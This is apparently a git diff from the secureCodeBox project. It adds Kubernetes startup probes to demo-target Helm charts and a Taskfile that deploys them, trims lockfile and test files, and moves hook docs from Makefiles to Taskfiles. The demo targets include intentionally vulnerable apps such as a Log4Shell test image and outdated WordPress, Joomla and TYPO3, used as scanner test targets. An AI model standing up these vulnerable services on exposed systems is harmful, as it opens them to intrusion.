"1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json deleted file mode 100644 index 448a77429d..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json +++ /dev/null @@ -1,18 +0,0 @@ -{ - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "description": "", - "scripts": { - "test": "pull-secret-extraction.test.js", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "author": "iteratec GmbH", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1" - } -} diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js deleted file mode 100644 index 2ce6990b25..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js +++ /dev/null @@ -1,26 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); -kc.loadFromDefault(); - -const k8sPodsApi = kc.makeApiClient(k8s.CoreV1Api); - -test( - "Test if initcontainer creates correct secrets", - async () => { - let secret; - try { - secret = await k8sPodsApi.readNamespacedSecret( - "test-secret", - "integration-test" - ); - } finally { - expect(secret).toBeDefined(); - } - }, - 60 * 1000 -); diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml new file mode 100644 index 0000000000..c182550429 --- /dev/null +++ b/demo-targets/Taskfile.yaml @@ -0,0 +1,79 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +tasks: + deploy:app: + internal: true + status: + - helm --namespace demo-targets get all {{ .app }} + cmds: + - helm --namespace demo-targets upgrade --create-namespace --install {{ .app }} {{ .TASKFILE_DIR }}/{{ .app }}/ --wait + + deploy:bodgeit: + cmd: + task: deploy:app + vars: + app: bodgeit + + deploy:dummy-ssh: + cmd: + task: deploy:app + vars: + app: dummy-ssh + + deploy:http-webhook: + cmd: + task: deploy:app + vars: + app: http-webhook + + deploy:juice-shop: + cmd: + task: deploy:app + vars: + app: juice-shop + + deploy:old-joomla: + cmd: + task: deploy:app + vars: + app: old-joomla + + deploy:old-typo3: + cmd: + task: deploy:app + vars: + app: old-typo3 + + deploy:old-wordpress: + cmd: + task: deploy:app + vars: + app: old-wordpress + + deploy:swagger-petstore: + cmd: + task: deploy:app + vars: + app: swagger-petstore + + deploy:unsafe-https: + cmd: + task: deploy:app + vars: + app: unsafe-https + + deploy:vulnerable-log4j: + cmd: + task: deploy:app + vars: + app: vulnerable-log4j + + deploy:nginx: + cmds: + - kubectl create namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - + - kubectl create deployment --image nginx:alpine nginx --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - + - kubectl expose deployment nginx --port 80 --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - diff --git a/demo-targets/bodgeit/templates/deployment.yaml b/demo-targets/bodgeit/templates/deployment.yaml index 22910b9e90..e165402d5b 100644 --- a/demo-targets/bodgeit/templates/deployment.yaml +++ b/demo-targets/bodgeit/templates/deployment.yaml @@ -38,16 +38,22 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 + timeoutSeconds: 5 livenessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap b/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap index d71b8c7f9c..3835ba9ab9 100644 --- a/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap +++ b/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap @@ -47,7 +47,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: bodgeit ports: - containerPort: 8080 @@ -58,7 +57,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -73,6 +71,14 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 + timeoutSeconds: 5 imagePullSecrets: - name: foo nodeSelector: diff --git a/demo-targets/dummy-ssh/templates/deployment.yaml b/demo-targets/dummy-ssh/templates/deployment.yaml index bd8ffaff82..e058d51233 100644 --- a/demo-targets/dummy-ssh/templates/deployment.yaml +++ b/demo-targets/dummy-ssh/templates/deployment.yaml @@ -38,6 +38,12 @@ spec: - name: ssh containerPort: 22 protocol: TCP + startupProbe: + tcpSocket: + port: 22 + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: tcpSocket: port: 22 diff --git a/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap b/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap index 2ac436ccb5..8de190c814 100644 --- a/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap +++ b/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap @@ -68,6 +68,12 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + periodSeconds: 3 + successThreshold: 1 + tcpSocket: + port: 22 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/http-webhook/templates/deployment.yaml b/demo-targets/http-webhook/templates/deployment.yaml index 120af929fe..515355bdd1 100644 --- a/demo-targets/http-webhook/templates/deployment.yaml +++ b/demo-targets/http-webhook/templates/deployment.yaml @@ -49,6 +49,24 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 + livenessProbe: + httpGet: + path: / + port: http + readinessProbe: + httpGet: + path: / + port: http + periodSeconds: 10 + failureThreshold: 3 + successThreshold: 1 resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} diff --git a/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap b/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap index ca10197f30..024edcd3d0 100644 --- a/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap +++ b/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap @@ -42,11 +42,22 @@ matches the snapshot: containers: - image: docker.io/mendhak/http-https-echo:latest imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: / + port: http name: http-webhook ports: - containerPort: 8080 name: http protocol: TCP + readinessProbe: + failureThreshold: 3 + httpGet: + path: / + port: http + periodSeconds: 10 + successThreshold: 1 resources: requests: cpu: 123m @@ -58,6 +69,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/juice-shop/templates/deployment.yaml b/demo-targets/juice-shop/templates/deployment.yaml index dd5a84643b..79f603d3b5 100644 --- a/demo-targets/juice-shop/templates/deployment.yaml +++ b/demo-targets/juice-shop/templates/deployment.yaml @@ -51,6 +51,13 @@ spec: - name: http containerPort: 3000 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap b/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap index ef324c844e..fd100f1438 100644 --- a/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap +++ b/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap @@ -95,6 +95,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 volumeMounts: - mountPath: /juice-shop/config name: custom-config diff --git a/demo-targets/old-joomla/templates/deployment.yaml b/demo-targets/old-joomla/templates/deployment.yaml index 4524722c19..e50f491c93 100644 --- a/demo-targets/old-joomla/templates/deployment.yaml +++ b/demo-targets/old-joomla/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap b/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap index 32fc0710c1..a683a28857 100644 --- a/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap +++ b/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap @@ -62,6 +62,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/old-typo3/templates/deployment.yaml b/demo-targets/old-typo3/templates/deployment.yaml index 83fdcf5095..508553b62e 100644 --- a/demo-targets/old-typo3/templates/deployment.yaml +++ b/demo-targets/old-typo3/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap b/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap index 45307caa5a..1afbb74652 100644 --- a/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap +++ b/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap @@ -62,6 +62,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/old-wordpress/templates/deployment.yaml b/demo-targets/old-wordpress/templates/deployment.yaml index 1ccc7fc6be..bfb263ca4e 100644 --- a/demo-targets/old-wordpress/templates/deployment.yaml +++ b/demo-targets/old-wordpress/templates/deployment.yaml @@ -38,16 +38,21 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap b/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap index 5c94d43751..40ce2b37bd 100644 --- a/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap +++ b/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap @@ -50,7 +50,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: old-wordpress ports: - containerPort: 80 @@ -61,7 +60,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -76,6 +74,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/swagger-petstore/templates/deployment.yaml b/demo-targets/swagger-petstore/templates/deployment.yaml index 9dd9c79ee3..ca48aacbfb 100644 --- a/demo-targets/swagger-petstore/templates/deployment.yaml +++ b/demo-targets/swagger-petstore/templates/deployment.yaml @@ -52,16 +52,21 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap b/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap index 9598368643..2208317b3e 100644 --- a/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap +++ b/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap @@ -54,7 +54,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: swagger-petstore ports: - containerPort: 8080 @@ -65,7 +64,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -80,6 +78,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/unsafe-https/templates/deployment.yaml b/demo-targets/unsafe-https/templates/deployment.yaml index 91daadeb02..1b343a6d73 100644 --- a/demo-targets/unsafe-https/templates/deployment.yaml +++ b/demo-targets/unsafe-https/templates/deployment.yaml @@ -38,6 +38,12 @@ spec: - name: https containerPort: 443 protocol: TCP + startupProbe: + tcpSocket: + port: 443 + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: tcpSocket: port: 443 diff --git a/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap b/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap index 35987f2ddf..979ea466bd 100644 --- a/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap +++ b/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap @@ -68,6 +68,12 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + periodSeconds: 3 + successThreshold: 1 + tcpSocket: + port: 443 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/vulnerable-log4j/templates/deployment.yaml b/demo-targets/vulnerable-log4j/templates/deployment.yaml index 96d7ae48d2..aeecb3d3b5 100644 --- a/demo-targets/vulnerable-log4j/templates/deployment.yaml +++ b/demo-targets/vulnerable-log4j/templates/deployment.yaml @@ -38,6 +38,21 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 + livenessProbe: + httpGet: + path: / + port: http + readinessProbe: + httpGet: + path: / + port: http resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} diff --git a/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap b/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap index 50773fc070..754289a782 100644 --- a/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap +++ b/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap @@ -46,11 +46,19 @@ matches the snapshot: containers: - image: ghcr.io/christophetd/log4shell-vulnerable-app:0.0.0 imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: / + port: http name: vulnerable-log4j ports: - containerPort: 8080 name: http protocol: TCP + readinessProbe: + httpGet: + path: / + port: http resources: requests: cpu: 123m @@ -62,6 +70,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/documentation/docs/contributing/integrating-a-hook/dockerfile.md b/documentation/docs/contributing/integrating-a-hook/dockerfile.md index e8b975fdd6..56bbb9db2d 100644 --- a/documentation/docs/contributing/integrating-a-hook/dockerfile.md +++ b/documentation/docs/contributing/integrating-a-hook/dockerfile.md @@ -16,7 +16,7 @@ FROM node:22-alpine as build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM securecodebox/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/documentation/docs/contributing/integrating-a-hook/hook.md b/documentation/docs/contributing/integrating-a-hook/hook.md index 542e0c8538..dfcd0b567f 100644 --- a/documentation/docs/contributing/integrating-a-hook/hook.md +++ b/documentation/docs/contributing/integrating-a-hook/hook.md @@ -35,13 +35,12 @@ When the rawResults are in form of a json file, getRawResults will return the pa ::: ```js -async function handle({ getRawResults }) { +export async function handle({ getRawResults }) { const result = await getRawResults(); // outputs string representation of the scan result file // e.g. the nmap xml output console.log(result); } -module.exports.handle = handle; ``` ### getFindings() @@ -51,12 +50,11 @@ This callback function will provide all findings to the hook as an array of find Example: ```js -async function handle({ getFindings }) { +export async function handle({ getFindings }) { const findings = await getFindings(); // logs the findings returned by the parser of the scantype console.log(findings); } -module.exports.handle = handle; ``` ### updateRawResults() @@ -76,7 +74,7 @@ If you want to perform actions on all findings consider using the `updateFinding Example ```js -async function handle({ updateRawResults }) { +export async function handle({ updateRawResults }) { // Overrides the raw results with a fixed nmap report await updateRawResults(` @@ -94,7 +92,6 @@ WARNING: No targets were specified, so 0 hosts scanned. `); } -module.exports.handle = handle; ``` ### updateFindings() @@ -112,7 +109,7 @@ If you make changes to some findings you will have to call `updateFindings()` wi Example: ```js -async function handle({ +export async function handle({ updateFindings, }) { // Overrides the findings with a fixed nmap finding @@ -162,7 +159,7 @@ Notice that the `handle()` function has to be exported to use in the _hook-sdk_ ::: ```js -async function handle({ +export async function handle({ getFindings, scan, webhookUrl = process.env["WEBHOOK_URL"], @@ -177,7 +174,6 @@ async function handle({ body: JSON.stringify({ scan, findings }) });; } -module.exports.handle = handle; ``` ## hook.test.js diff --git a/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md b/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md index 52da4d2ad2..e246ca0051 100644 --- a/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md +++ b/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md @@ -30,7 +30,7 @@ The directory structure of a hook Helm Chart will look something like this: │   └── NOTES.txt ├── Chart.yaml ├── values.yaml -├── Makefile +├── Taskfile.yaml ├── README.md ├── .helm-docs.gotmpl ├── .helmignore diff --git a/documentation/docs/contributing/integrating-a-hook/integration-tests.md b/documentation/docs/contributing/integrating-a-hook/integration-tests.md index 30082281ce..78bafd7ca2 100644 --- a/documentation/docs/contributing/integrating-a-hook/integration-tests.md +++ b/documentation/docs/contributing/integrating-a-hook/integration-tests.md @@ -18,7 +18,7 @@ to test your hook is by running it after test-scan or against a scan of a `demo- Let's have a look at the [read-write-hook](https://github.com/secureCodeBox/secureCodeBox/blob/main/tests/integration/generic/read-write-hook.test.js) test to understand all the steps required: ```javascript -const { scan } = require("../helpers"); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost port scan should only find a host finding", @@ -64,7 +64,7 @@ higher than the timeout provided above. ## Run your integration tests locally -Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [makefile](/docs/contributing/integrating-a-hook/makefile) to run your integration tests locally. +Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [Taskfile](/docs/contributing/integrating-a-hook/taskfile) to run your integration tests locally. ## Integrate in ci.yaml diff --git a/documentation/docs/contributing/integrating-a-hook/makefile.md b/documentation/docs/contributing/integrating-a-hook/makefile.md index 4019c360a7..44452650e5 100644 --- a/documentation/docs/contributing/integrating-a-hook/makefile.md +++ b/documentation/docs/contributing/integrating-a-hook/makefile.md @@ -3,10 +3,14 @@ # # SPDX-License-Identifier: Apache-2.0 -title: Makefile -sidebar_position: 4 +title: Makefile (Deprecated) +sidebar_position: 5 --- +:::caution Deprecated +Makefiles have been deprecated in favor of Taskfiles. Please refer to the [Taskfile](./taskfile.md) documentation for the current approach. +::: + To test your hook locally, you may use the following makefile. ```makefile diff --git a/documentation/docs/contributing/integrating-a-hook/taskfile.md b/documentation/docs/contributing/integrating-a-hook/taskfile.md new file mode 100644 index 0000000000..aa4e68944a --- /dev/null +++ b/documentation/docs/contributing/integrating-a-hook/taskfile.md @@ -0,0 +1,126 @@ +--- +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +title: Taskfile +sidebar_position: 4 +--- + +To test your hook locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. + +## Basic Hook Taskfile + +Create a `Taskfile.yaml` in your hook directory with the following content: + +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: your-hook-name # Replace with your hook's name + +tasks: {} +``` + +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your hook name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your hook | +| deploy | Deploys your hook helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your hook unit tests | +| test:integration | Run integration tests for your hook | +| test:helm | Run helm tests for your hook | +| test | Run all tests (unit, helm, and integration) | + +## Running Tests + +To run tests for your hook, you can use the following commands: + +```bash +# Run only unit tests +task test:unit + +# Run only integration tests +task test:integration + +# Run only helm unit tests +task test:helm + +# Run all tests (unit, helm, and integration) +task test +``` + +## Customizing Your Taskfile + +### Adding Custom Tasks + +You can add custom tasks specific to your hook by defining them in the `tasks` section: + +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my hook" +``` + +### Customizing Deployment + +If you need to customize the deployment process, you can override the `predeploy` task: + +```yaml +tasks: + predeploy: + desc: "Prepare environment for hook deployment" + cmds: + - kubectl create namespace my-hook-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-hook-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Adding Test Dependencies (demo-targets) + +To add test dependencies, you can create a custom task that runs before the integration tests: + +```yaml +tasks: + deploy-test-deps: + desc: "Deploy test dependencies for my hook" + cmds: + - task: demo-targets:deploy-http-webhook + - task: demo-targets:deploy-test-scan +``` + +### Changing the Unit Test Language + +If your hook is written in a language other than JavaScript, you can customize the test:unit task: + +```yaml +tasks: + test:unit: + desc: "Run Java unit tests for my hook" + cmds: + - cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook && ./gradlew test +``` + +## Testing Environment Setup + +Before running integration tests, make sure you have set up the testing environment: + +```bash +# From the project root directory +task prepare-testing-env +``` + +This will create a kind cluster and deploy the secureCodeBox operator. \ No newline at end of file diff --git a/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md b/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md index b816424ac1..dfe90f70b6 100644 --- a/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md +++ b/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md @@ -26,6 +26,8 @@ scanners/nmap │   │   ├── nmap-results.xml │   │   └── scan.yaml │   └── ... +├── integration-tests +│   ├── nmap.test.js ├── parser │   ├── Dockerfile │   ├── package.json @@ -42,7 +44,7 @@ scanners/nmap │   └── Dockerfile ├── Chart.yaml 